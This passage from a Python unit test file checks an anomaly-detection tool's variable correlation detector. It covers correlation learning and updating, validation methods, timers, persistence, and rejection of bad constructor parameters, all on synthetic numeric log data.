validate_cor_distinct_thres=0.05, num_init=self.dataset_size) for i in range(self.dataset_size): children = [MatchElement(str(1), unsimilar_data2[i], unsimilar_data2[i], None), MatchElement(str(2), unsimilar_data3[i], unsimilar_data3[i], None)] log_atom = LogAtom(unsimilar_data1[i], ParserMatch(MatchElement("/", unsimilar_data1[i], unsimilar_data1[i], children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vtd.receive_atom(log_atom) vcd.init_cor(0) old_w_rel_list = deepcopy(vcd.w_rel_list[0]) vcd.validate_cor() self.assertEqual(len(old_w_rel_list), len(vcd.w_rel_list[0])) expected_unsimilar_correlations = [[ {}, {"a": {"a": 10}, "b": {"a": 15}, "c": {"a": 15}, "d": {"a": 10}, "e": {"b": 20, "c": 25, "d": 5}}], [ {}, {"a": {"a": 25}, "b": {"a": 15}, "d": {"c": 5, "d": 5}}], [ {"a": {"a": 10}, "b": {"a": 15}, "c": {"b": 15}, "d": {"c": 10}, "e": {"c": 40, "d": 10}}, { "a": {"a": 10, "b": 15}, "b": {"c": 15}, "c": {"d": 10, "e": 40}, "d": {"e": 10}}]] for w_rel in vcd.w_rel_list[0]: for cor in w_rel: deleted = False for expected_unsimilar_correlation in expected_unsimilar_correlations: if cor in expected_unsimilar_correlation: index = expected_unsimilar_correlation.index(cor) del expected_unsimilar_correlation[index] deleted = True break # if the correlation was not deleted an error is raised and the test fails. if not deleted: raise ValueError("Correlation %s could not be found in the WRel List.%s" % (cor, vcd.w_rel_list[0])) self.assertEqual([[], [], []], expected_unsimilar_correlations) def test13validate_correlation_rules_distinctDistr_without_WRel(self): """This test case checks if an error occurs, when using the distinctDistr validation method without the WRel correlation method.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_cor_meth=["Rel"], used_validate_cor_meth=["distinctDistr"]) def test14nonexistent_validation_method(self): """This test case checks if an error occurs, when using an nonexistent validation method or empty list.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1, used_validate_cor_meth=["nonexistentValidateCorDMeth"]) def test15update_and_test_correlation_rules_with_rel_correlation_method(self): """ This test case checks the functionality of the Rel correlation method in the update, correlation generation and test phases. The correlations are initialized with 10 values for each correlation and keys calculated with (i % 10) * 0.1. In the update phase keys are calculated with (i % 10) * 0.2. Due to that the existing value"s count must stay the same in cases where new values are not created and new values must be created from 1.0 to 1.8. Values are increased by or created with a count of 10. """ etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=["Rel"], num_init=self.dataset_size) self.update_or_test_with_rel_correlation_method(etd, vcd, update_rules=True, generate_rules=True) for rel in vcd.rel_list[0]: for r in rel: for i in r: key = i value = r[key] # existing values which are divisible by 2 and smaller than 10.0 should be updated. if key % 2 == 0 and key < 10.0: self.assertEqual({key: 20}, value) # new values which are divisible by 2 and greater than 10.0 should be created. # other values should stay the same as before. else: self.assertEqual({key: 10}, value) etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=["Rel"], num_init=self.dataset_size) self.update_or_test_with_rel_correlation_method(etd, vcd, update_rules=True, generate_rules=False) for rel in vcd.rel_list[0]: for r in rel: for i in r: key = i value = r[key] # no new values should be created. self.assertFalse(key % 2 == 0 and key >= 10.0) # existing values which are divisible by 2 and smaller than 10.0 should be updated. if key % 2 == 0 and key < 10.0: self.assertEqual({key: 20}, value) # other values should stay the same as before. else: self.assertEqual({key: 10}, value) etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=["Rel"], num_init=self.dataset_size) old_rel_list = self.update_or_test_with_rel_correlation_method(etd, vcd, update_rules=False, generate_rules=False) # no values in the rel_list should be changed. self.assertEqual(vcd.rel_list[0], old_rel_list) etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=["Rel"], num_init=self.dataset_size) offset = 200 self.update_or_test_with_rel_correlation_method(etd, vcd, update_rules=True, generate_rules=False, offset=offset) # old correlations from child elements with the value being divisible by 2 should be deleted. The first ten correlations from the # initialization phase were not touched and should remain the same. The other correlation however should delete every value which # is divisible by 2. rel_list = deepcopy(vcd.rel_list[0]) # delete correlations from the init phase. for rel in vcd.rel_list[0]: if rel[0] == rel[1]: index = rel_list.index(rel) del rel_list[index] self.assertEqual(1, len(rel_list)) for rel in rel_list: # the order of the correlations is not guaranteed. if len(rel[0]) > len(rel[1]): rel0 = rel[0] rel1 = rel[1] else: rel0 = rel[1] rel1 = rel[0] for i in rel0: key = i value = rel0[key] self.assertEqual({key: 10}, value) for i in rel1: key = i value = rel1[key] # no values divisible by 2 should exist. self.assertFalse(key % 2 == 0) self.assertEqual({key: 10}, value) def update_or_test_with_rel_correlation_method(self, etd, vcd, update_rules, generate_rules, offset=0): """Run the update or test of rel correlations.""" t = time.time() values = [] # generate the initialization data with child elements being (i % 10) * 1. for i in range(self.dataset_size): stat_data = bytes(str((i % 10) * 1), "utf-8") values.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", stat_data, stat_data, children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.init_cor(0) # test if the initialization contains only correlations with 10 values. for rel in vcd.rel_list[0]: for r in rel: for i in r: key = i value = r[key] self.assertEqual({key: 10}, value) old_rel_list = deepcopy(vcd.rel_list[0]) values = [] # generate the update data with child elements being (i % 10) * 2. for i in range(self.dataset_size): stat_data = bytes(str((i % 10) * 2 + offset), "utf-8") values.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", str((i % 10) * 2).encode(), str((i % 10) * 2).encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.log_atom = log_atom vcd.update_rules[0] = update_rules vcd.generate_rules[0] = generate_rules vcd.update_or_test_cor(0) return old_rel_list def test16update_and_test_correlation_rules_with_w_rel_correlation_method(self): """ This test case checks the functionality of the WRel correlation method in the update, correlation generation and test phases. The correlations are initialized with 70% of the values having (i % 10) * 0.1 and 30% of the values having (i % 10) * 0.2. In the update phase the ratio is changed from 70:30 to 80:20. Thus the expected ratio is 75:25, when update_rules=True wihout offset. """ # This part tests if rules are updated when update_rules=True and generate_rules=True, however no new rules are generated as the # same data is passed on in the update process. etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=["WRel"], num_init=self.dataset_size, num_update=self.dataset_size, max_dist_rule_distr=0.5) self.update_or_test_with_w_rel_correlation_method(etd, vcd, update_rules=True, generate_rules=True) self.assertEqual(1, len(vcd.w_rel_list[0])) for rel in vcd.w_rel_list[0]: for r in rel: for i in r: key = i value = r[key] if key == 0: self.assertEqual({key: 20}, value) elif key >= 10.0: self.assertEqual({key/2: 5}, value) elif key % 2 == 0: self.assertTrue(value in ({key/2: 5, key: 15}, {key*2: 5, key: 15})) else: self.assertTrue(value in ({key: 15}, {key*2: 5, key: 15})) # This part tests if rules are updated when update_rules=True and generate_rules=False. Therefore the assumptions of correlations is # the same as above, because there were no new correlations generated due to the same data being used. etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=["WRel"], num_init=self.dataset_size, num_update=self.dataset_size, max_dist_rule_distr=0.5) self.update_or_test_with_w_rel_correlation_method(etd, vcd, update_rules=True, generate_rules=False) self.assertEqual(1, len(vcd.w_rel_list[0])) for rel in vcd.w_rel_list[0]: for r in rel: for i in r: key = i value = r[key] if key == 0: self.assertEqual({key: 20}, value) elif key >= 10.0: self.assertEqual({key/2: 5}, value) elif key % 2 == 0: self.assertTrue(value in ({key/2: 5, key: 15}, {key*2: 5, key: 15})) else: self.assertTrue(value in ({key: 15}, {key*2: 5, key: 15})) # This part tests if rules are updated when update_rules=False and generate_rules=False. No correlation should be changed. etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=["WRel"], num_init=self.dataset_size, num_update=self.dataset_size, max_dist_rule_distr=0.5) old_w_rel_list = self.update_or_test_with_w_rel_correlation_method(etd, vcd, update_rules=False, generate_rules=False) # no values in the rel_list should be changed. self.assertEqual(vcd.w_rel_list[0], old_w_rel_list) # This part tests if rules are updated when update_rules=True and generate_rules=False but with an offset of 200. Therefore the # assumptions of correlations for the first part should stay the same and no new correlations should be learned, because an offset # is added to all data. etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=["WRel"], num_init=self.dataset_size, num_update=self.dataset_size, max_dist_rule_distr=0.5) offset = 200 self.update_or_test_with_w_rel_correlation_method(etd, vcd, update_rules=True, generate_rules=False, offset=offset) self.assertEqual(1, len(vcd.w_rel_list[0])) for rel in vcd.w_rel_list[0]: for r in rel: for i in r: key = i value = r[key] if key == 0: self.assertTrue(value in ({key: 10}, {key: 10, float(offset): 2})) elif key >= 10.0: self.assertEqual({key / 2: 3}, value) elif key % 2 == 0: self.assertTrue(value in ({key/2: 3, key: 7}, {key*2: 3, key: 7, key*2+offset: 2})) else: self.assertTrue(value in ({key: 7}, {key*2: 3, key: 7, key*2+offset: 2})) # This part tests if rules are updated when update_rules=True and generate_rules=True but with an offset of 200. Therefore the # assumptions of correlations for the first part should stay the same and new correlations should be learned, because an offset # is added to all data. etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, used_cor_meth=["WRel"], num_init=self.dataset_size, num_update=self.dataset_size, max_dist_rule_distr=0.5) offset = 200 self.update_or_test_with_w_rel_correlation_method(etd, vcd, update_rules=True, generate_rules=True, offset=offset) self.assertEqual(1, len(vcd.w_rel_list[0])) for rel in vcd.w_rel_list[0]: for r in rel: for i in r: key = i value = r[key] if key == 0: self.assertTrue(value in ({key: 10}, {key: 0, float(offset): 2})) elif key >= 10.0: self.assertTrue(value in ({(key-offset)/2: 2}, {key/2: 3}, {(key-offset)/2: 2, key: 8}, {key: 8})) elif key % 2 == 0: self.assertTrue(value in ({key/2: 3, key: 7}, {key*2: 0, key: 0, key*2+offset: 2})) else: self.assertTrue(value in ({key: 7}, {key*2: 0, key: 0, key*2+offset: 2})) def update_or_test_with_w_rel_correlation_method(self, etd, vcd, update_rules, generate_rules, offset=0): """ Run the update or test of w_rel correlations. This method initializes the vcd with a distribution of 70% 0.1 and 30% 0.2. In the update phase the distribution is 80% 1 and 20% 2. """ t = time.time() values = [] # generate the initialization data with child elements being (i % 10) * 1. for i in range(70): stat_data = bytes(str((i % 10) * 1), "utf-8") values.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", stat_data, stat_data, children)), t, self.__class__.__name__) etd.receive_atom(log_atom) for i in range(30): stat_data = bytes(str((i % 10) * 2), "utf-8") values.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", str((i % 10) * 1).encode(), str((i % 10) * 1).encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.init_cor(0) old_w_rel_list = deepcopy(vcd.w_rel_list[0]) self.assertEqual(1, len(vcd.w_rel_list[0])) for rel in vcd.w_rel_list[0]: for r in rel: for i in r: key = i value = r[key] if key == 0: self.assertEqual({key: 10}, value) elif key >= 10.0: self.assertEqual({key/2: 3}, value) elif key % 2 == 0: self.assertTrue(value in ({key/2: 3, key: 7}, {key*2: 3, key: 7})) else: self.assertTrue(value in ({key: 7}, {key*2: 3, key: 7})) values = [] for i in range(80): stat_data = bytes(str((i % 10) * 1 + offset), "utf-8") values.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", stat_data, stat_data, children)), t, self.__class__.__name__) etd.receive_atom(log_atom) for i in range(20): stat_data = bytes(str((i % 10) * 2 + offset), "utf-8") values.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", str((i % 10) * 1).encode(), str((i % 10) * 1).encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.log_atom = log_atom vcd.update_rules[0] = update_rules vcd.generate_rules[0] = generate_rules vcd.update_or_test_cor(0) return old_w_rel_list def test17init_and_update_timings(self): """This test checks if the init and update intervals are calculated correctly.""" t = time.time() etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5, num_init=self.dataset_size, num_update=self.dataset_size) values = [] for i in range(self.dataset_size): stat_data = bytes(str((i % 10) * 0.1), "utf-8") values.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", str((i % 10) * 0.1).encode(), str((i % 10) * 0.1).encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.receive_atom(log_atom) if i < self.dataset_size - 1: self.assertEqual(vcd.pos_var_cor, []) self.assertEqual(vcd.pos_var_val, []) self.assertEqual(vcd.w_rel_list, []) self.assertEqual(vcd.rel_list, []) # just check if some values were learned and save them to compare. self.assertNotEqual(vcd.pos_var_cor, []) self.assertNotEqual(vcd.pos_var_val, []) self.assertNotEqual(vcd.w_rel_list, []) self.assertNotEqual(vcd.rel_list, []) old_pos_var_cor = deepcopy(vcd.pos_var_cor) old_pos_var_val = deepcopy(vcd.pos_var_val) old_w_rel_list = deepcopy(vcd.w_rel_list) old_rel_list = deepcopy(vcd.rel_list) values = [] for i in range(self.dataset_size): stat_data = bytes(str((i % 10) * 1), "utf-8") values.append(float(stat_data)) children = [MatchElement(str(0), stat_data, stat_data, None)] log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", str((i % 10) * 1).encode(), str((i % 10) * 1).encode(), children)), t, self.__class__.__name__) etd.receive_atom(log_atom) vcd.receive_atom(log_atom) if i < self.dataset_size - 1: self.assertEqual(vcd.pos_var_cor, old_pos_var_cor) self.assertEqual(vcd.pos_var_val, old_pos_var_val) self.assertEqual(vcd.w_rel_list, old_w_rel_list) self.assertEqual(vcd.rel_list, old_rel_list) # no new values are expected as num_steps_create_new_rules is -1 by default. self.assertEqual(vcd.pos_var_cor, old_pos_var_cor) self.assertEqual(vcd.pos_var_val, old_pos_var_val) self.assertNotEqual(vcd.w_rel_list, old_w_rel_list) self.assertNotEqual(vcd.rel_list, old_rel_list) def test18do_timer(self): """Test if the do_timer method is implemented properly.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1) t = time.time() vcd.next_persist_time = t + 400 self.assertEqual(vcd.do_timer(t + 200), 200) self.assertEqual(vcd.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD) self.assertEqual(vcd.do_timer(t + 999), 1) self.assertEqual(vcd.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD) def test19persistence(self): """Test the do_persist and load_persistence_data methods.""" t = time.time() etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) vtd = VariableTypeDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=self.dataset_size, div_thres=0.1, test_gof_int=False, sim_thres=0.5, gof_alpha=self.significance_niveau) vcd = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1) for i in range(self.dataset_size): stat_data = bytes(str((i % 60) * 0.1), "utf-8") log_atom = LogAtom(stat_data, ParserMatch(MatchElement("/", stat_data, stat_data, None)), t, self.__class__.__name__) etd.receive_atom(log_atom) vtd.receive_atom(log_atom) vcd.init_cor(0) # the vcd should not learn any correlations in others data. self.assertEqual(vcd.pos_var_cor, [[]]) self.assertEqual(vcd.pos_var_val, [[]]) self.assertEqual(vcd.discrete_indices, [[]]) self.assertEqual(vcd.update_rules, [True]) self.assertEqual(vcd.generate_rules, [True]) self.assertEqual(vcd.rel_list, [[]]) self.assertEqual(vcd.w_rel_list, [[]]) self.assertEqual(vcd.w_rel_num_ll_to_vals, [[]]) self.assertEqual(vcd.w_rel_ht_results, []) self.assertEqual(vcd.w_rel_confidences, []) vcd.do_persist() with open(vcd.persistence_file_name, "r") as f: self.assertEqual(f.read(), '[[[]], [[]], [[]], [true], [true], [[]], [[]], [[]], [], []]') vcd.load_persistence_data() self.assertEqual(vcd.pos_var_cor, [[]]) self.assertEqual(vcd.pos_var_val, [[]]) self.assertEqual(vcd.discrete_indices, [[]]) self.assertEqual(vcd.update_rules, [True]) self.assertEqual(vcd.generate_rules, [True]) self.assertEqual(vcd.rel_list, [[]]) self.assertEqual(vcd.w_rel_list, [[]]) self.assertEqual(vcd.w_rel_num_ll_to_vals, [[]]) self.assertEqual(vcd.w_rel_ht_results, []) self.assertEqual(vcd.w_rel_confidences, []) other = VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.1) self.assertEqual(vcd.pos_var_cor, other.pos_var_cor) self.assertEqual(vcd.pos_var_val, other.pos_var_val) self.assertEqual(vcd.discrete_indices, other.discrete_indices) self.assertEqual(vcd.update_rules, other.update_rules) self.assertEqual(vcd.generate_rules, other.generate_rules) self.assertEqual(vcd.rel_list, other.rel_list) self.assertEqual(vcd.w_rel_list, other.w_rel_list) self.assertEqual(vcd.w_rel_num_ll_to_vals, other.w_rel_num_ll_to_vals) self.assertEqual(vcd.w_rel_ht_results, other.w_rel_ht_results) self.assertEqual(vcd.w_rel_confidences, other.w_rel_confidences) def test20validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, ["default"], etd) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, None, etd) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, "", etd) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, b"Default", etd) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, True, etd) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, 123, etd) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, 123.3, etd) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, {"id": "Default"}, etd) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, (), etd) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, set(), etd) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], "") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], None) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], True) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 123) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 123.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], {"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], ["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], []) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], ()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id="") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=None) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=True) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=123) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=123.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id="Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=b"True") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode="True") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=123) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=123.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list="") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=True) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=123) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=123.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=["/model/path"]) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=[]) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=None) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=0) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=100.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_init=100) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=0) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=100.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_update=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_update=100) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=-1) self.assertRaises(ValueError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=1.1) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=0.5) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, disc_div_thres=1) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_steps_create_new_rules=100.22) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_steps_create_new_rules=b"Default") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_steps_create_new_rules="123") self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_steps_create_new_rules={"id": "Default"}) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_steps_create_new_rules=["Default"]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_steps_create_new_rules=[]) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_steps_create_new_rules=()) self.assertRaises(TypeError, VariableCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_steps_create_new_rules=set()) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_steps_create_new_rules=100) VariableCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], etd, num_steps_create_new_rules=-1) 